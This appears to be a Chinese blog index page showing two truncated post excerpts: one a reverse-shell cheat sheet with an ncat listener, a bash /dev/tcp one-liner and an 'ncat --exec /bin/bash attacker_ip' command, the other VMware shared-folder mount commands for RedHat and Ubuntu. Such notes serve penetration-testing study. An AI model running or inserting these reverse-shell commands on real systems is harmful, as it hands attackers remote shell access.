摘要: Attacker listening: ncat --listen --source-port 9999 Bash: bash -i >& /dev/tcp/intrinsic/9999 0>&1 ncat: ncat --exec /bin/bash attacker_ip attacker_po 阅读全文
posted @ 2022-12-24 15:49 ascertain 阅读(21) 评论(0) 推荐(0)
摘要: RedHat: vmhgfs-fuse .host:/ /mnt/hgfs -o allow_other -o uid=1000 -o gid=1000 -o umask=022 chmod a+x /etc/rc.d/rc.local Ubuntu: vmhgfs-fuse .host:/ /mn 阅读全文
posted @ 2022-12-24 12:56 ascertain 阅读(60) 评论(0) 推荐(0)